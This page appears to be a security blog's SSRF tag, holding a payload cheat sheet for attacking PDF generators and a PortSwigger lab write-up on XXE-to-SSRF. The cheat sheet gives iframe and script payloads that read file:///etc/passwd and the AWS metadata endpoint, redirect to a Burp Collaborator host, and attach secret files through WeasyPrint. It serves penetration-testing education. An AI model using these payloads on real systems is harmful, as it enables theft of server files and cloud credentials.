Skip to content

Tag: SSRF

Testing for SSRF during PDF Generation

https://unsplash.com/photos/QvU0LNnr26U

How to test for SSRF during PDF Generation?

User input is reflected in the PDF.

HTML elements are parsed by the PDF Generator Libraries.

Research the specific types of data that can be parsed by the target’s PDF Generator Library in order to generate a payload

Payloads

If HTML is parsed directly:

Recon

<script>
  document.write(window.location.href); 
  document.write(window.location.hostname); 
  document.write(window.location.pathname); 
  document.write(window.location.protocol); 
  document.write(window.location.host); 
  document.write(window.location.port); 
</script>

Redirect with iframe

<iframe+src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">

AWS

<iframe src="http://169.254.169.254/user-data">

Files

<iframe src="file:///etc/passwd">

WeasyPrint PDF Test

Trying to embed a secret file in the PDF? You can try this payload if the target is parsing a HTML page. One thing that you can do is host the index html file in Heroku etc. and pass it to the target’s PDF generation endpoint.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>WeasyPrint PDF Test</title>
    <link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
    <h1>WeasyPrint PDF Test</h1>
</body>
</html>

In the PDF reader, open up the Attachment section and view the embedded file.

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf

Lab Write-up: Exploiting XXE to perform SSRF attacks

In this post, you will see how an XML external entity attack can be exploited to perform a SSRF. The lab can be found in this link (https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf).

In the lab description, it was mentioned that the app server is running on AWS’s EC2 instance. To retrieve metadata about the server, you will need to inject an external entity to call this url:
http://169.254.169.254/

The next thing to take note is to notice the XML payload is being posted to the server. Below is the screenshot:

If you try to change the Product ID value to a random string, you can see that the response is showing the random string back. This means that you can inject the metadata to Product ID to retrieve the information.

Notice when we change to product ID to ‘testing123’, the value will be reflected back.

You will need to inject the below external entity into the XML payload:

The response will return ‘latest’. But what the hell is that? It took me a while to figure out that this is a folder name.

You see now that the URL is ‘http://169.254.169.254/latest’, the value ‘metadata’ is returned.

Eventually, when you keep appending the folder name to the URL, you will see the AWS EC2 metadata.